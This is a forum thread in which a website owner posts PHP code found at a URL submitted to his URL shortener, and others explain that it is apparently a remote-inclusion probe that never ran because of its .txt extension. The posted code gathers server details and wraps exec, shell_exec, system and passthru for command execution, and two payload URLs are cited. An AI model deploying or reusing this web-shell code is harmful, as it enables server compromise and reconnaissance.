Results 1 to 4 of 4

Thread: What is this?!

  1. #1
    Join Date
    Jan 2009
    Location
    Philadelphia, Pennsylvania
    Posts
    1,797

    What is this?!

    Someone put the following URL into my URL Shortener:
    I do not recommend clicking this link:
    http:// ta-photo .com /templates/Varages/mild.txt???

    Anyway, I visited it and it showed me this:

    PHP Code:
    <?php
    //CADOTUNJI Response
    $pwd1 =    @getcwd();
    $un = @php_uname();
    $os = @PHP_OS;
    $id1 ex("id");if (empty($id1)) {$id1 = @get_current_user();}
    $sof1 =    @getenv("SERVER_SOFTWARE");

    $php1 =    @phpversion();
    $name1 $_SERVER['SERVER_NAME'];
    $ip1 = @gethostbyname($SERVER_ADDR);
    $free1=    @diskfreespace($pwd1);
    $all1disk_total_space($pwd1);
    $used =    ConvertBytes($all1-$free1);
    $free =    ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free 0;}

    $all ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all 0;}
    if (@
    is_writable($pwd1)) {$perm "[W]";} else {$perm "[R]";}
    if (@
    ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf "ON";} else {$sf "OFF";}


    echo 
    "CADOTUNJI".$sf."<br>";
    echo 
    "uname -a:    $un<br>";
    echo 
    "os: $os<br>";
    echo 
    "id: $id1<br>";
    echo 
    "pwd: $pwd1<br>";

    echo 
    "php: $php1<br>";
    echo 
    "software:    $sof1<br>";
    echo 
    "srvip: $ip1<br>";
    echo 
    "srvname: $name1<br>";
    echo 
    "free: $free<br>";

    echo 
    "used: $used<br>";
    echo 
    "total: $all $perm<br>";

    function 
    ConvertBytes($number) {
     
    $len strlen($number);
     if(
    $len 4) { return sprintf("%d b"$number); }

    if(
    $len >= && $len <=6) { return sprintf("%0.2f Kb"$number/1024); }
     if(
    $len >= && $len <=9) { return sprintf("%0.2f Mb"$number/1024/1024); }
     return 
    sprintf("%0.2f Gb"$number/1024/1024/1024);

    }

    function 
    ex($cfe) {
     
    $res '';
     if (!empty(
    $cfe)) {
     if(
    function_exists('exec')) {
     @
    exec($cfe,$res);
     
    $res join("\n",$res);
     } elseif(
    function_exists('shell_exec')) {

    $res = @shell_exec($cfe);
     } elseif(
    function_exists('system')) {
     @
    ob_start();
     @
    system($cfe);
     
    $res = @ob_get_contents();
     @
    ob_end_clean();
     } elseif(
    function_exists('passthru')) {

    @
    ob_start();
     @
    passthru($cfe);
     
    $res = @ob_get_contents();
     @
    ob_end_clean();
     } elseif(@
    is_resource($f = @popen($cfe,"r"))) {
     
    $res "";
     while(!@
    feof($f)) { $res .= @fread($f,1024); }

    @
    pclose($f);
     } else { 
    $res "NULL"; }
     }
     return 
    $res;
    }


    ?>
    Is this some sort of exploit? Are they seeking vulnerabilities in my server? To be honest, I'm quite concerned.

    I removed it from the database. And I also found this, and removed it as well:
    http:// www. koreadefence .net/data/shirohige/zfxid.txt??

  2. #2
    It looks like some sort of php exploit but don't worry about it because if you saw that code that means it didn't work. It's not supposed to show you the source code. If you do a search for "CADOTUNJI"you will see a couple hacked websites in the search results.

  3. #3
    It displays the source code because the file name is mild.txt. With the TXT extension, it never gets run through the PHP parser.

    Perhaps the intention is to provide the source code to someone.
    "Democracy is two wolves and a lamb voting on what to have for lunch. Liberty is a well-armed lamb contesting the vote." -- Benjamin Franklin


  4. #4
    Good point. It is a text file so it is harmless in that it didn't run. But it may be harmful in that if he was using a URL shortener he is probably showing this code to others, and if it's malicious code that could be bad.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •